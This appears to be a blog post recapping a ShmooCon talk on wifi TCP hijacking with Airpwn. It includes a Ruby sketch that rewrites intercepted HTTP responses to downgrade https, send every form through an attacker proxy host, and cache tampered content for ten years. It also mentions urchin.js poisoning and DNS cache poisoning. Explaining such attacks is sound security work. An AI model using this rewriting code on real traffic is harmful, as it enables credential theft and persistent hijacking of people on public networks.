Airpwn TCP hijack, we’re serious this time

Having to fill a last-minute ShmooCon opening, dragorn delivered a very thought-provoking talk. You may know him for his indispensable wifi tool, Kismet. He blew through 100 slides in 20 minutes and I'm sure I'll miss the finer points, but it really turned out to be something potentially incredible (and destructive). He laid the groundwork by discussing how heavily open public wifi hotspots are used. Many of us understand the risk, but he set out to show even more unexplored territory.

802.11 traffic is trivial to capture and, as Toast demonstrated at Defcon, easy to inject into with airpwn. Many people saw this, but the full implications weren't really understood, so dragorn decided to expand on the idea. The team built a new version, the Airpwn TCP hijack, for the Metasploit framework. It now supports full content replacement using regexes and a very fast Ruby-based packet assembler.

dragorn outlined the many ways you could use this. You could modify one of the many helper .js files that browsers download while loading pages. You could rewrite the DOM to your benefit, change every form to submit through your proxy, or change every https link to plain http.

These attacks could be made persistent by telling the browser to cache the .js for an extremely long time (10 years, even), as rsnake described in his VPN research. Then, when the user returned to their home intranet, the exploit would still be viable; it could even phone home to fetch new .js payloads. Want to make the attack really generic? Poison urchin.js, the script that every site using Google Analytics makes you load.
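To make the two previous paragraphs concrete, here is an added Ruby sketch of the kind of regex content replacement the talk describes: downgrade https links to http, point every form at an attacker proxy, and replace the cache headers so the tampered object lives in the browser cache for ten years. This is example code written for this post, not dragorn's Airpwn module or anything from Metasploit; the proxy hostname, the helper names and the captured HTTP response are all assumptions constructed for the example.

```ruby
require 'uri'

# Assumed attacker-controlled relay host (hypothetical, .invalid TLD on purpose).
PROXY_HOST = "proxy.example.invalid"
# The "10 years" cache lifetime from the talk, in seconds.
TEN_YEARS  = 10 * 365 * 24 * 3600

# Constructed sample: a captured HTTP response for a page that loads urchin.js,
# carries an https login form and links to an https mail host.
SAMPLE_RESPONSE = [
  "HTTP/1.1 200 OK",
  "Content-Type: text/html",
  "Cache-Control: no-cache",
  "",
  '<html><head><script src="https://www.example.com/urchin.js"></script></head>',
  '<body><form action="https://login.example.com/auth" method="post">',
  '<input name="user"><input name="pass" type="password"></form>',
  '<a href="https://mail.example.com/">mail</a></body></html>'
].join("\r\n")

# Split a raw response into its header lines and its body.
def split_response(raw)
  head, body = raw.split("\r\n\r\n", 2)
  [head.split("\r\n"), body.to_s]
end

# Rule 1: rewrite every https URL in the body to plain http.
def downgrade_https(body)
  body.gsub(%r{https://}i, "http://")
end

# Rule 2: send every form through the proxy, keeping the original target
# as a query parameter so the relay can forward the credentials onward.
def reroute_forms(body, proxy = PROXY_HOST)
  body.gsub(/(<form\b[^>]*\baction=")([^"]*)(")/i) do
    target = URI.encode_www_form_component($2)
    "#{$1}http://#{proxy}/relay?to=#{target}#{$3}"
  end
end

# Rule 3: drop the server's freshness/validation headers and replace them
# with a very long max-age so the tampered response is cached for years.
def make_persistent(headers, seconds = TEN_YEARS)
  kept = headers.reject { |h| h =~ /\A(cache-control|expires|pragma|etag|last-modified):/i }
  kept << "Cache-Control: public, max-age=#{seconds}"
end

# Apply all three rules and fix Content-Length to match the new body.
def rewrite_response(raw)
  headers, body = split_response(raw)
  body = downgrade_https(reroute_forms(body))
  headers = make_persistent(headers)
  headers = headers.reject { |h| h =~ /\Acontent-length:/i }
  headers << "Content-Length: #{body.bytesize}"
  (headers + ["", body]).join("\r\n")
end

puts rewrite_response(SAMPLE_RESPONSE)
```

The order matters: forms are rerouted before the https downgrade so the percent-encoded original target in the `to=` parameter is left alone while every literal `https://` in the page still becomes `http://`. The real tool applies its rules to the live TCP stream on the wire rather than to a captured string; this sketch only shows the replacement logic.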

What's the answer? Securing your connection with a VPN, perhaps. This doesn't really help the average user, though, because it's difficult to do. And if the hotspot's splash page is served over http and only hands off the login to https, the attacker can hijack you starting with that very first page, before the VPN is ever up.

dragorn also built DNSpwn, a DNS hijack. You can use it to poison someone's DNS cache so that the bogus entries persist even after they switch to a VPN.

This is one of those attacks that even expert users could easily miss. At the end of his talk, dragorn lamented, "I've ruined wifi for myself."

